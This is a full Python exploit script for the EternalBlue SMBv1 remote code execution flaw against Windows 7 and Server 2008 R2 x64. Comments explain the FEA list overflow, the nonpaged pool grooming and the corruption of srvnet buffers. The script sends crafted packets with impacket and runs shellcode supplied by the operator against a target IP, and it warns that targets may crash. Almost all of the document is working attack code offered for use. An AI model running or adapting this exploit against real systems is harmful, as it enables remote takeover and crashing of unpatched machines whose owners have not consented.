Microsoft Windows 7/2008 R2 x64 EternalBlue Remote Code Execution

`#!/usr/bin/python  
from impacket import smb  
from struct import pack  
import os  
import sys  
import socket  
  
'''  
EternalBlue exploit for Windows 7/2008 by sleepya  
The exploit might FAIL and CRASH a target system (depended on what is overwritten)  
  
Tested on:  
- Windows 7 SP1 x64  
- Windows 2008 R2 x64  
  
Reference:  
- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/  
  
  
Bug detail:  
- For the bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/  
- You can see SrvOs2FeaListToNt(), SrvOs2FeaListSizeToNt() and SrvOs2FeaToNt() functions logic from WinNT4 source code  
https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/ea.c#L263  
- In vulnerable SrvOs2FeaListSizeToNt() function, there is a important change from WinNT4 in for loop. The psuedo code is here.  
if (nextFea > lastFeaStartLocation) {  
// this code is for shrinking FeaList->cbList because last fea is invalid.  
// FeaList->cbList is DWORD but it is cast to WORD.  
*(WORD *)FeaList = (BYTE*)fea - (BYTE*)FeaList;  
return size;  
}  
- Here is related struct info.  
#####  
typedef struct _FEA { /* fea */  
BYTE fEA; /* flags */  
BYTE cbName; /* name length not including NULL */  
USHORT cbValue; /* value length */  
} FEA, *PFEA;  
  
typedef struct _FEALIST { /* feal */  
DWORD cbList; /* total bytes of structure including full list */  
FEA list[1]; /* variable length FEA structures */  
} FEALIST, *PFEALIST;  
  
typedef struct _FILE_FULL_EA_INFORMATION {  
ULONG NextEntryOffset;  
UCHAR Flags;  
UCHAR EaNameLength;  
USHORT EaValueLength;  
CHAR EaName[1];  
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;  
######  
  
  
Exploit info:  
- I do not reverse engineer any x86 binary so I do not know about exact offset.  
- The exploit use heap of HAL (address 0xffffffffffd00010 on x64) for placing fake struct and shellcode.  
This memory page is executable on Windows 7 and Wndows 2008.  
- The important part of feaList and fakeStruct is copied from NSA exploit which works on both x86 and x64.  
- The exploit trick is same as NSA exploit  
- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.  
- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)  
- See the code and comment for exploit detail.  
  
  
srvnet buffer info:  
- srvnet buffer contains a pointer to another struct and MDL about received buffer  
- Controlling MDL values results in arbitrary write  
- Controlling pointer to fake struct results in code execution because there is pointer to function  
- A srvnet buffer is created after target receiving first 4 bytes  
- First 4 bytes contains length of SMB message  
- The possible srvnet buffer size is "..., 0x8???, 0x11000, 0x21000, ...". srvnet.sys will select the size that big enough.  
- After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message  
- SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler()  
- SrvNetCommonReceiveHandler() passes SMB message to SMB handler  
- If a pointer in srvnet buffer is modified to fake struct, we can make SrvNetCommonReceiveHandler() call our shellcode  
- If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called  
- Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen.  
- Memory leak is ok to be ignored  
'''  
  
# wanted overflown buffer size (this exploit support only 0x10000 and 0x11000)  
# the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time  
# the size 0x11000 is used in nsa exploit. this size is more reliable.  
NTFEA_SIZE = 0x11000  
# the NTFEA_SIZE above is page size. We need to use most of last page preventing any data at the end of last page  
  
ntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde  
  
ntfea11000 = (pack('<BBH', 0, 0, 0) + '\x00')*600 # with these fea, ntfea size is 0x1c20  
ntfea11000 += pack('<BBH', 0, 0, 0xf3bd) + 'A'*0xf3be # 0x10fe8 - 0x1c20 - 0xc = 0xf3bc  
  
ntfea1f000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x2494 # with these fea, ntfea size is 0x1b6f0  
ntfea1f000 += pack('<BBH', 0, 0, 0x48ed) + 'A'*0x48ee # 0x1ffe8 - 0x1b6f0 - 0xc = 0x48ec  
  
ntfea = { 0x10000 : ntfea10000, 0x11000 : ntfea11000 }  
  
'''  
Reverse from srvnet.sys (Win7 x64)  
- SrvNetAllocateNonPagedBufferInternal() and SrvNetWskReceiveComplete():  
  
// for x64  
struct SRVNET_BUFFER {  
// offset from POOLHDR: 0x10  
USHORT flag;  
char pad[2];  
char unknown0[12];  
// offset from SRVNET_POOLHDR: 0x20  
LIST_ENTRY list;  
// offset from SRVNET_POOLHDR: 0x30  
char *pnetBuffer;  
DWORD netbufSize; // size of netBuffer  
DWORD ioStatusInfo; // copy value of IRP.IOStatus.Information  
// offset from SRVNET_POOLHDR: 0x40  
MDL *pMdl1; // at offset 0x70  
DWORD nByteProcessed;  
DWORD pad3;  
// offset from SRVNET_POOLHDR: 0x50  
DWORD nbssSize; // size of this smb packet (from user)  
DWORD pad4;  
QWORD pSrvNetWekStruct; // want to change to fake struct address  
// offset from SRVNET_POOLHDR: 0x60  
MDL *pMdl2;  
QWORD unknown5;  
// offset from SRVNET_POOLHDR: 0x70  
// MDL mdl1; // for this srvnetBuffer (so its pointer is srvnetBuffer address)  
// MDL mdl2;  
// char transportHeader[0x50]; // 0x50 is TRANSPORT_HEADER_SIZE  
// char netBuffer[0];  
};  
  
struct SRVNET_POOLHDR {  
DWORD size;  
char unknown[12];  
SRVNET_BUFFER hdr;  
};  
'''  
# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing  
# Here is the important fields on x64  
# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.  
# The value MUST point to valid (might be fake) struct.  
# - offset 0x70 (MDL) : MDL for describe receiving SMB request buffer  
# - 0x70 (VOID*) : MDL.Next should be NULL  
# - 0x78 (USHORT) : MDL.Size should be some value that not too small  
# - 0x7a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)  
# - 0x80 (VOID*) : MDL.Process should be NULL  
# - 0x88 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.  
# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).  
#   
#  
# To free the corrupted srvnet buffer, shellcode MUST modify some memory value to satisfy condition.  
# Here is related field for freeing corrupted buffer  
# - offset 0x10 (USHORT): be 0xffff to make SrvNetFreeBuffer() really free the buffer (else buffer is pushed to srvnet lookaside)  
# a corrupted buffer MUST not be reused.  
# - offset 0x48 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0  
# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to  
# your shellcode as function argument  
# - offset 0x60 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set  
# The last condition is your shellcode MUST return non-negative value. The easiest way to do is "xor eax,eax" before "ret".  
# Here is x64 assembly code for setting nByteProcessed field  
# - fetch SRVNET_BUFFER address from function argument  
# \x48\x8b\x54\x24\x40 mov rdx, [rsp+0x40]  
# - set nByteProcessed for trigger free after return  
# \x8b\x4a\x2c mov ecx, [rdx+0x2c]  
# \x89\x4a\x38 mov [rdx+0x38], ecx  
  
TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010  
TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000  
  
fakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2  
fakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2  
fakeSrvNetBufferNsa += '\x00'*16  
fakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20)  
fakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0xffffffff, 0x60, 0x1004, 0) # _, x86 MDL.Next, .Size, .MdlFlags, .Process  
fakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64) # x86 MDL.MappedSystemVa, _, x64 pointer to fake struct  
fakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # x64 pmdl2  
# below 0x20 bytes is overwritting MDL  
# NSA exploit overwrite StartVa, ByteCount, ByteOffset fields but I think no need because ByteCount is always big enough  
fakeSrvNetBufferNsa += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags  
fakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa  
  
# below is for targeting x64 only (all x86 related values are set to 0)  
# this is for show what fields need to be modified  
fakeSrvNetBufferX64 = pack('<II', 0x11000, 0)*2  
fakeSrvNetBufferX64 += pack('<HHIQ', 0xffff, 0, 0, 0)  
fakeSrvNetBufferX64 += '\x00'*16  
fakeSrvNetBufferX64 += '\x00'*16  
fakeSrvNetBufferX64 += '\x00'*16 # 0x40  
fakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64) # _, _, pointer to fake struct  
fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # pmdl2  
fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags  
fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa  
  
  
fakeSrvNetBuffer = fakeSrvNetBufferNsa  
#fakeSrvNetBuffer = fakeSrvNetBufferX64  
  
feaList = pack('<I', 0x10000) # the max value of feaList size is 0x10000 (the only value that can trigger bug)  
feaList += ntfea[NTFEA_SIZE]  
# Note:  
# - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively  
# - x64: below fea will be copy to offset 0x11000 of overflow buffer  
# - x86: below fea will be copy to offset 0x10ff8 of overflow buffer  
feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer)-1) + fakeSrvNetBuffer # -1 because first '\x00' is for name  
# stop copying by invalid flag (can be any value except 0 and 0x80)  
feaList += pack('<BBH', 0x12, 0x34, 0x5678)  
  
  
# fake struct for SrvNetWskReceiveComplete() and SrvNetCommonReceiveHandler()  
# x64: fake struct is at ffffffff ffd00010  
# offset 0xa0: LIST_ENTRY must be valid address. cannot be NULL.  
# offset 0x08: set to 3 (DWORD) for invoking ptr to function  
# offset 0x1d0: KSPIN_LOCK  
# offset 0x1d8: array of pointer to function  
#  
# code path to get code exection after this struct is controlled  
# SrvNetWskReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr  
fake_recv_struct = pack('<QII', 0, 3, 0)  
fake_recv_struct += '\x00'*16  
fake_recv_struct += pack('<QII', 0, 3, 0)  
fake_recv_struct += ('\x00'*16)*7  
fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0xa0, TARGET_HAL_HEAP_ADDR_x64+0xa0) # offset 0xa0 (LIST_ENTRY to itself)  
fake_recv_struct += '\x00'*16  
fake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86+0xc0, TARGET_HAL_HEAP_ADDR_x86+0xc0, 0) # x86 LIST_ENTRY  
fake_recv_struct += ('\x00'*16)*11  
fake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x190) # fn_ptr array on x86  
fake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86+0x1f0-1, 0) # x86 shellcode address  
fake_recv_struct += ('\x00'*16)*3  
fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1e0) # offset 0x1d0: KSPINLOCK, fn_ptr array  
fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1f0-1) # x64 shellcode address - 1 (this value will be increment by one)  
  
  
def getNTStatus(self):  
return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']  
setattr(smb.NewSMBPacket, "getNTStatus", getNTStatus)  
  
def sendEcho(conn, tid, data):  
pkt = smb.NewSMBPacket()  
pkt['Tid'] = tid  
  
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)  
transCommand['Parameters'] = smb.SMBEcho_Parameters()  
transCommand['Data'] = smb.SMBEcho_Data()  
  
transCommand['Parameters']['EchoCount'] = 1  
transCommand['Data']['Data'] = data  
pkt.addCommand(transCommand)  
  
conn.sendSMB(pkt)  
recvPkt = conn.recvSMB()  
if recvPkt.getNTStatus() == 0:  
print('got good ECHO response')  
else:  
print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))  
  
  
# do not know why Word Count can be 12  
# if word count is not 12, setting ByteCount without enough data will be failed  
class SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):  
structure = (  
('MaxBuffer','<H'),  
('MaxMpxCount','<H'),  
('VCNumber','<H'),  
('SessionKey','<L'),  
#('AnsiPwdLength','<H'),  
('UnicodePwdLength','<H'),  
('_reserved','<L=0'),  
('Capabilities','<L'),  
)  
  
def createSessionAllocNonPaged(target, size):  
# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function  
# You can see the allocation logic (even code is not the same) in WinNT4 source code   
# https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071  
conn = smb.SMB(target, target)  
_, flags2 = conn.get_flags()  
# FLAGS2_EXTENDED_SECURITY MUST not be set  
flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY  
# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16  
if size >= 0xffff:  
flags2 &= ~smb.SMB.FLAGS2_UNICODE  
reqSize = size // 2  
else:  
flags2 |= smb.SMB.FLAGS2_UNICODE  
reqSize = size  
conn.set_flags(flags2=flags2)  
  
pkt = smb.NewSMBPacket()  
  
sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)  
sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()  
  
sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size  
sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value  
sessionSetup['Parameters']['VCNumber'] = os.getpid()  
sessionSetup['Parameters']['SessionKey'] = 0  
sessionSetup['Parameters']['AnsiPwdLength'] = 0  
sessionSetup['Parameters']['UnicodePwdLength'] = 0  
sessionSetup['Parameters']['Capabilities'] = 0x80000000  
  
# set ByteCount here  
sessionSetup['Data'] = pack('<H', reqSize) + '\x00'*20  
pkt.addCommand(sessionSetup)  
  
conn.sendSMB(pkt)  
recvPkt = conn.recvSMB()  
if recvPkt.getNTStatus() == 0:  
print('SMB1 session setup allocate nonpaged pool success')  
else:  
print('SMB1 session setup allocate nonpaged pool failed')  
return conn  
  
  
# Note: impacket-0.9.15 struct has no ParameterDisplacement  
############# SMB_COM_TRANSACTION2_SECONDARY (0x33)  
class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):  
structure = (  
('TotalParameterCount','<H=0'),  
('TotalDataCount','<H'),  
('ParameterCount','<H=0'),  
('ParameterOffset','<H=0'),  
('ParameterDisplacement','<H=0'),  
('DataCount','<H'),  
('DataOffset','<H'),  
('DataDisplacement','<H=0'),  
('FID','<H=0'),  
)  
  
def send_trans2_second(conn, tid, data, displacement):  
pkt = smb.NewSMBPacket()  
pkt['Tid'] = tid  
  
# assume no params  
  
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)  
transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()  
transCommand['Data'] = smb.SMBTransaction2Secondary_Data()  
  
transCommand['Parameters']['TotalParameterCount'] = 0  
transCommand['Parameters']['TotalDataCount'] = len(data)  
  
fixedOffset = 32+3+18  
transCommand['Data']['Pad1'] = ''  
  
transCommand['Parameters']['ParameterCount'] = 0  
transCommand['Parameters']['ParameterOffset'] = 0  
  
if len(data) > 0:  
pad2Len = (4 - fixedOffset % 4) % 4  
transCommand['Data']['Pad2'] = '\xFF' * pad2Len  
else:  
transCommand['Data']['Pad2'] = ''  
pad2Len = 0  
  
transCommand['Parameters']['DataCount'] = len(data)  
transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len  
transCommand['Parameters']['DataDisplacement'] = displacement  
  
transCommand['Data']['Trans_Parameters'] = ''  
transCommand['Data']['Trans_Data'] = data  
pkt.addCommand(transCommand)  
  
conn.sendSMB(pkt)  
  
  
def send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):  
pkt = smb.NewSMBPacket()  
pkt['Tid'] = tid  
  
command = pack('<H', setup)  
  
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)  
transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()  
transCommand['Parameters']['MaxSetupCount'] = 1  
transCommand['Parameters']['MaxParameterCount'] = len(param)  
transCommand['Parameters']['MaxDataCount'] = 0  
transCommand['Data'] = smb.SMBTransaction2_Data()  
  
transCommand['Parameters']['Setup'] = command  
transCommand['Parameters']['TotalParameterCount'] = len(param)  
transCommand['Parameters']['TotalDataCount'] = len(data)  
  
fixedOffset = 32+3+38 + len(command)  
if len(param) > 0:  
padLen = (4 - fixedOffset % 4 ) % 4  
padBytes = '\xFF' * padLen  
transCommand['Data']['Pad1'] = padBytes  
else:  
transCommand['Data']['Pad1'] = ''  
padLen = 0  
  
transCommand['Parameters']['ParameterCount'] = len(param)  
transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen  
  
if len(data) > 0:  
pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4  
transCommand['Data']['Pad2'] = '\xFF' * pad2Len  
else:  
transCommand['Data']['Pad2'] = ''  
pad2Len = 0  
  
transCommand['Parameters']['DataCount'] = firstDataFragmentSize  
transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len  
  
transCommand['Data']['Trans_Parameters'] = param  
transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]  
pkt.addCommand(transCommand)  
  
conn.sendSMB(pkt)  
conn.recvSMB() # must be success  
  
i = firstDataFragmentSize  
while i < len(data):  
sendSize = min(4096, len(data) - i)  
if len(data) - i <= 4096:  
if not sendLastChunk:  
break  
send_trans2_second(conn, tid, data[i:i+sendSize], i)  
i += sendSize  
  
if sendLastChunk:  
conn.recvSMB()  
return i  
  
  
# connect to target and send a large nbss size with data 0x80 bytes  
# this method is for allocating big nonpaged pool (no need to be same size as overflow buffer) on target  
# a nonpaged pool is allocated by srvnet.sys that started by useful struct (especially after overwritten)  
def createConnectionWithBigSMBFirst80(target):  
# https://msdn.microsoft.com/en-us/library/cc246496.aspx  
# Above link is about SMB2, but the important here is first 4 bytes.  
# If using wireshark, you will see the StreamProtocolLength is NBSS length.  
# The first 4 bytes is same for all SMB version. It is used for determine the SMB message length.  
#  
# After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message.  
# srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message.  
# Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too.  
sk = socket.create_connection((target, 445))  
# For this exploit, use size is 0x11000  
pkt = '\x00' + '\x00' + pack('>H', 0xfff7)  
# There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.  
# Also this is invalid SMB2 message.  
# I believe NSA exploit use SMB2 for hiding alert from IDS  
#pkt += '\xffSMB' # smb2  
# it can be anything even it is invalid  
pkt += 'BAAD' # can be any  
pkt += '\x00'*0x7c  
sk.send(pkt)  
return sk  
  
  
def exploit(target, shellcode, numGroomConn):  
# force using smb.SMB for SMB1  
conn = smb.SMB(target, target)  
  
# can use conn.login() for ntlmv2  
conn.login_standard('', '')  
server_os = conn.get_server_os()  
print('Target OS: '+server_os)  
if not (server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 ")):  
print('This exploit does not support this target')  
sys.exit()  
  
  
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')  
  
# Here is code path in WinNT4 (all reference files are relative path to https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/)  
# - SrvSmbNtTransaction() (smbtrans.c#L2677)  
# - When all data is received, call ExecuteTransaction() at (smbtrans.c#L3113)  
# - ExecuteTransaction() (smbtrans.c#L82)  
# - Call dispatch table (smbtrans.c#L347)  
# - Dispatch table is defined at srvdata.c#L972 (target is command 0, SrvSmbOpen2() function)  
# - SrvSmbOpen2() (smbopen.c#L1002)  
# - call SrvOs2FeaListToNt() (smbopen.c#L1095)  
  
# https://msdn.microsoft.com/en-us/library/ee441720.aspx  
# Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command  
# Note: cannot use SMB_COM_TRANSACTION2 for the exploit because the TotalDataCount field is USHORT  
# Note: transaction max data count is 66512 (0x103d0) and DataDisplacement is USHORT  
progress = send_nt_trans(conn, tid, 0, feaList, '\x00'*30, 2000, False)  
# we have to know what size of NtFeaList will be created when last fragment is sent  
  
# make sure server recv all payload before starting allocate big NonPaged  
#sendEcho(conn, tid, 'a'*12)  
  
# create buffer size NTFEA_SIZE-0x1000 at server  
# this buffer MUST NOT be big enough for overflown buffer  
allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)  
  
# groom nonpaged pool  
# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one  
srvnetConn = []  
for i in range(numGroomConn):  
sk = createConnectionWithBigSMBFirst80(target)  
srvnetConn.append(sk)  
  
# create buffer size NTFEA_SIZE at server  
# this buffer will be replaced by overflown buffer  
holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)  
# disconnect allocConn to free buffer  
# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer  
allocConn.get_socket().close()  
  
# hope one of srvnetConn is next to holeConn  
for i in range(5):  
sk = createConnectionWithBigSMBFirst80(target)  
srvnetConn.append(sk)  
  
# send echo again, all new 5 srvnet buffers should be created  
#sendEcho(conn, tid, 'a'*12)  
  
# remove holeConn to create hole for fea buffer  
holeConn.get_socket().close()  
  
# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header  
send_trans2_second(conn, tid, feaList[progress:], progress)  
recvPkt = conn.recvSMB()  
retStatus = recvPkt.getNTStatus()  
# retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag  
if retStatus == 0xc000000d:  
print('good response status: INVALID_PARAMETER')  
else:  
print('bad response status: 0x{:08x}'.format(retStatus))  
  
  
# one of srvnetConn struct header should be modified  
# a corrupted buffer will write recv data in designed memory address  
for sk in srvnetConn:  
sk.send(fake_recv_struct + shellcode)  
  
# execute shellcode by closing srvnet connection  
for sk in srvnetConn:  
sk.close()  
  
# nicely close connection (no need for exploit)  
conn.disconnect_tree(tid)  
conn.logoff()  
conn.get_socket().close()  
  
  
if len(sys.argv) < 3:  
print("{} <ip> <shellcode_file> [numGroomConn]".format(sys.argv[0]))  
sys.exit(1)  
  
TARGET=sys.argv[1]  
numGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])  
  
fp = open(sys.argv[2], 'rb')  
sc = fp.read()  
fp.close()  
  
print('shellcode size: {:d}'.format(len(sc)))  
print('numGroomConn: {:d}'.format(numGroomConn))  
  
exploit(TARGET, sc, numGroomConn)  
print('done')  
  
`